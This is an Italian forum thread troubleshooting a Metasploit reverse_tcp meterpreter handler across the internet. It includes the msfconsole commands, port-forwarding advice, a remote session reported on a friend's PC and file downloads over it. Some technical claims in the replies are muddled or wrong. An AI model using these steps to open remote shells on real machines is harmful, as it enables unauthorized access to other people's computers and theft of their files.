Domanda msfconsole

[HackEarth]

Buona sera gente, qualcuno mi può dire come mai mi da questo errore Handler failed to bind to xxx.xxx.xxx.xxx:8080:- -? Ovviamenteho aperto la porta 8080.
msf > use exploit/multi/handler
msf exploit(handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(handler) > set lhost xxx.xxx.xxx.xxx
lhost => xxx.xxx.xxx.xxx
msf exploit(handler) > set lport 8080
lport => 8080
msf exploit(handler) > run

[-] Handler failed to bind to xxx.xxx.xxx.xxx:8080:- -
[*] Started reverse TCP handler on 0.0.0.0:8080
[*] Starting the payload handler...

 

[Rossi12320]

Buona sera gente, qualcuno mi può dire come mai mi da questo errore Handler failed to bind to xxx.xxx.xxx.xxx:8080:- -? Ovviamenteho aperto la porta 8080.
msf > use exploit/multi/handler
msf exploit(handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(handler) > set lhost xxx.xxx.xxx.xxx
lhost => xxx.xxx.xxx.xxx
msf exploit(handler) > set lport 8080
lport => 8080
msf exploit(handler) > run

[-] Handler failed to bind to xxx.xxx.xxx.xxx:8080:- -
[*] Started reverse TCP handler on 0.0.0.0:8080
[*] Starting the payload handler...

Io spero che tu non ci abbia messo seriamente le X la


Inviato dal mio iPhone utilizzando Tapatalk

 

[HackEarth]

Io spero che tu non ci abbia messo seriamente le X la


Inviato dal mio iPhone utilizzando Tapatalk

Sai com'è... è il mio indirizzo IP pubblico, non sono scemo. Se fosse stato quello locale l'avrei lasciato. Usa un po il cervello ogni tanto.
E in qualsiasi caso non sei stato utile nella risoluzione del problema.

 

[Rossi12320]

Sai com'è... è il mio indirizzo IP pubblico, non sono scemo. Se fosse stato quello locale l'avrei lasciato. Usa un po il cervello ogni tanto.
E in qualsiasi caso non sei stato utile nella risoluzione del problema.

Infatti dei mettere quello locale bello di mamma. Usa un po' il cervello ogni tanto


Inviato dal mio iPhone utilizzando Tapatalk

 

[HackEarth]

Infatti dei mettere quello locale bello di mamma. Usa un po' il cervello ogni tanto


Inviato dal mio iPhone utilizzando Tapatalk

Lo so tesoro però lo sto testando con un mio amico, lui è dall altra parte della città e quindi devo per forza usare l'IP pubblico.

 

[Rossi12320]

Lo so tesoro però lo sto testando con un mio amico, lui è dall altra parte della città e quindi devo per forza usare l'IP pubblico.

Amore mio grande quando avvi msf devi mettere l'ip locale, ed aprire la porta facendo un redirect sul tuo il locale.
È quando generi il payload che devi usare l'ip pubblico. Bacetti e cuoricini


Inviato dal mio iPhone utilizzando Tapatalk

 

[HackEarth]

Amore mio grande quando avvi msf devi mettere l'ip locale, ed aprire la porta facendo un redirect sul tuo il locale.
È quando generi il payload che devi usare l'ip pubblico. Bacetti e cuoricini


Inviato dal mio iPhone utilizzando Tapatalk

Ok grazie amore mio.
Quindi sul mio router apro la porta 8080 e avvio msf e setto l ip locale mentre in msfvenom setto l ip pubblico giusto?

 

[The_BoSs_]

Ahahaahh ma anche no Non ci sarebbe senso logicamente.

Piuttosto di fare run alla fine prova a fare exploit.

E controlla che l'ip pubblico sia corretto perchè se il contratto non prevede un ip pubblico statico ma dinamico il tuo IP cambierà ad ogni riavvio del modem.

 

[HackEarth]

Ahahaahh ma anche no Non ci sarebbe senso logicamente.

Piuttosto di fare run alla fine prova a fare exploit.

E controlla che l'ip pubblico sia corretto perchè se il contratto non prevede un ip pubblico statico ma dinamico il tuo IP cambierà ad ogni riavvio del modem.

Io devo mettere in ascolto l ip pubblico con porta 8080 aperta però non riesco

 

[The_BoSs_]

Io devo mettere in ascolto l ip pubblico con porta 8080 aperta però non riesco

Ti ho appena risposto.

Piuttosto di fare run alla fine prova a fare exploit.

E controlla che l'ip pubblico sia corretto perchè se il contratto non prevede un ip pubblico statico ma dinamico il tuo IP cambierà ad ogni riavvio del modem.

 

[kalivsparrot]

run o exploit non fa differenza. Allora:
- controlla che il tuo ip non sia nattato, basta vedere se è della forma xxx.xxx.xxx.xxx, ma pare di sì dalle tue xxx sopra.
- genera un payload con il tool che preferisci inserendo il tuo ip pubblico e la parta che preferisci
- vai sulle impostazioni del modem e apri correttamente la porta inserita nel payload
- ora vai su msfconsole, inserisci ip locale e porta aperta e avvii.

 

[HackEarth]

Ti ho appena risposto.

Piuttosto di fare run alla fine prova a fare exploit.

E controlla che l'ip pubblico sia corretto perchè se il contratto non prevede un ip pubblico statico ma dinamico il tuo IP cambierà ad ogni riavvio del modem.

Ho già provato a fare un exploit e anche un exploit -j ma niente.
Comunque ho un ip dinamico...
Ah ma quindi se ho un ip dinamico non posso mettere in ascolto il mio iP? Ma posso farlo soltanto con ip statico?

 

[HackEarth]

run o exploit non fa differenza. Allora:
- controlla che il tuo ip non sia nattato, basta vedere se è della forma xxx.xxx.xxx.xxx, ma pare di sì dalle tue xxx sopra.
- genera un payload con il tool che preferisci inserendo il tuo ip pubblico e la parta che preferisci
- vai sulle impostazioni del modem e apri correttamente la porta inserita nel payload
- ora vai su msfconsole, inserisci ip locale e porta aperta e avvii.

Ah ok quindi come pensavo ip statico o dinamico non ha differenza...
Io sul modem ho aperto la 8080 tcp...
Su msfvenom ho messo l ip pubblico
Mentre su msfconsole ho provato a rimettere l ip pubblico però non funziona.. quindi dici di mettere su msfconsole l ip locale e non l ip pubblico giusto?

 

[kalivsparrot]

Ah ok quindi come pensavo ip statico o dinamico non ha differenza...
Io sul modem ho aperto la 8080 tcp...
Su msfvenom ho messo l ip pubblico
Mentre su msfconsole ho provato a rimettere l ip pubblico però non funziona.. quindi dici di mettere su msfconsole l ip locale e non l ip pubblico giusto?

IP locale su msfconsole, e invece della porta 8080, sempre premettendo tu l'abbia aperta correttamente e abbia settato il payload correttamente, apri la 443 e prova a usare questa.

 

[HackEarth]

IP locale su msfconsole, e invece della porta 8080, sempre premettendo tu l'abbia aperta correttamente e abbia settato il payload correttamente, apri la 443 e prova a usare questa.

OK, allora dopo sostituisco l'8080 con la 443. E provo a mettere l ip locale su msfconsole. Se ho degli errori mi farò risentire ahahaha
Grazie mille , lo testo dopo e vi dico come va...

 

[Rossi12320]

OK, allora dopo sostituisco l'8080 con la 443. E provo a mettere l ip locale su msfconsole. Se ho degli errori mi farò risentire ahahaha
Grazie mille , lo testo dopo e vi dico come va...

Oh ma quando le dico io le cose mica me credi ve?



Inviato dal mio iPhone utilizzando Tapatalk

 

[The_BoSs_]

Ma che cavolate state dicendo -.- come fa a mettersi in ascolto metasploit su un indirizzo pubblico se gli setti quello locale [emoji23] secondo me è più probabile che l'indirizzo sia sbagliato o la porta chiusa.

Comunque con ip dinamico puoi farlo ma appena riavvii il modem perdi la connessione


The_BoSs_

 

[Rossi12320]

Ma che cavolate state dicendo -.- come fa a mettersi in ascolto metasploit su un indirizzo pubblico se gli setti quello locale [emoji23] secondo me è più probabile che l'indirizzo sia sbagliato o la porta chiusa.

Comunque con ip dinamico puoi farlo ma appena riavvii il modem perdi la connessione


The_BoSs_

MA se non le sai le cose non è meglio che non parli ?


Inviato dal mio iPhone utilizzando Tapatalk

 

[kalivsparrot]

Ma che cavolate state dicendo -.- come fa a mettersi in ascolto metasploit su un indirizzo pubblico se gli setti quello locale [emoji23] secondo me è più probabile che l'indirizzo sia sbagliato o la porta chiusa.

Comunque con ip dinamico puoi farlo ma appena riavvii il modem perdi la connessione


The_BoSs_

Ecco il genio che non ha mai usato un payload. Ok, aspetto un video di come riesci a far comunicare due computer su due reti diverse inserendo su metasploit in ascolto il tuo ip pubblico. Oppure trovi qualcuno su youtube che lo fa.
Non troverai nessuno, e sai perché? Perché stai sbagliato e non sai di cosa parli.
Inoltre anche a livello di logica non te la cavi bene. Se tra te e il computer della vittima c'è il router, perché ti affacci al web attraverso quello, come fa il payload una volta arrivato al tuo router (non che il payload si sposta, ma sta cercando di "entrare in contatto" con il tuo computer) a capire a quale macchina comunicare le informazioni?

 

[HackEarth]

Ragazzi tranquilli ho risolto.... ho riprovato a mettere in ascolto l ip pubblico e anche se mi dava quell errore, sono riuscito a stabilire la connessione e ad entrare...
L' unica cosa che non sono riuscito a fare con l'exploit era scaricare i file del mio amico sul mio PC... ci siamo telefonati, e mi ha detto di provare a prendere un file che aveva chiamato prova.txt dove all interno aveva scritto prova, potevo leggere il contenuto però non sono riuscito a scaricare il file sul mio computer come mai?

Inviato dal mio SM-G935F utilizzando Tapatalk

 

[HackEarth]

Ecco il genio che non ha mai usato un payload. Ok, aspetto un video di come riesci a far comunicare due computer su due reti diverse inserendo su metasploit in ascolto il tuo ip pubblico. Oppure trovi qualcuno su youtube che lo fa.
Non troverai nessuno, e sai perché? Perché stai sbagliato e non sai di cosa parli.
Inoltre anche a livello di logica non te la cavi bene. Se tra te e il computer della vittima c'è il router, perché ti affacci al web attraverso quello, come fa il payload una volta arrivato al tuo router (non che il payload si sposta, ma sta cercando di "entrare in contatto" con il tuo computer) a capire a quale macchina comunicare le informazioni?

Concordo a pieno, però devo contraddirti su una cosa.
L ho ritestato, inserendo l ip pubblico, mi ha dato quell errore però al lancio dell exploit ha ricevuto tutto e ho stabilito l connessione.

 

[kalivsparrot]

Concordo a pieno, però devo contraddirti su una cosa.
L ho ritestato, inserendo l ip pubblico, mi ha dato quell errore però al lancio dell exploit ha ricevuto tutto e ho stabilito l connessione.

Certo che ti dà errore se su metasploit inserisci l'ip pubblico e devi inserire l'ip locale. Partendo dal fatto che dici di esserti connesso penso sia andata così:
- inserisci sbagliando l'ip pubblico, genera errore
- metasploit si autoconfigura su 0.0.0.0:xxx, che è il localhost
- per qualche motivo il payload riesce a capire l'ip locale del localhost (il tuo computer), non so bene il perché, forse grazie al tuo router che magari ha associato la porta aperta a quella determinata macchina o buh. O forse 0.0.0.0 gli basta e poi trova l'ip locale da se non ho mai fatto prove ma dubito.

Se invece dell'ip pubblico all'inizio metti quello locale non avrai errori. Che comando hai dato per scaricare?

 

[HackEarth]

Certo che ti dà errore se su metasploit inserisci l'ip pubblico e devi inserire l'ip locale. Partendo dal fatto che dici di esserti connesso penso sia andata così:
- inserisci sbagliando l'ip pubblico, genera errore
- metasploit si autoconfigura su 0.0.0.0:xxx, che è il localhost
- per qualche motivo il payload riesce a capire l'ip locale del localhost (il tuo computer), non so bene il perché, forse grazie al tuo router che magari ha associato la porta aperta a quella determinata macchina o buh. O forse 0.0.0.0 gli basta e poi trova l'ip locale da se non ho mai fatto prove ma dubito.

Se invece dell'ip pubblico all'inizio metti quello locale non avrai errori. Che comando hai dato per scaricare?

Ah ecco, perché...
Io quando ho aperto la porta ho detto che valeva solo per il mio indirizzo IP locale ovvero: 292.168.0.6 porta 443. Forse sarà per quello hai proprio ragione non ci ho pensato [emoji28]
Comunque per scaricare ho usato anzi per copiare ho usato download c\percorso

 

[kalivsparrot]

Ah ecco, perché...
Io quando ho aperto la porta ho detto che valeva solo per il mio indirizzo IP locale ovvero: 292.168.0.6 porta 443. Forse sarà per quello hai proprio ragione non ci ho pensato [emoji28]
Comunque per scaricare ho usato anzi per copiare ho usato download c\percorso

Non lo avevo aggiunta questa ipotesi, ma l'avevo pensata. Però non tutti i router hanno quest'opzione, indubbiamente utile. C'erano spazi nei nomi dei documenti o delle cartelle in cui dovevi dirigerti? Di solito è il problema più comune e lo si risolve con download "percorso" usando le virgolette.

 

[The_BoSs_]

Beh penso che era scontato... Comunque video non so se ne trovi ma io ho sempre fatto così e ha sempre funzionato -.- come di fatti il problema è stato ovviato con ip pubblico al payload


The_BoSs_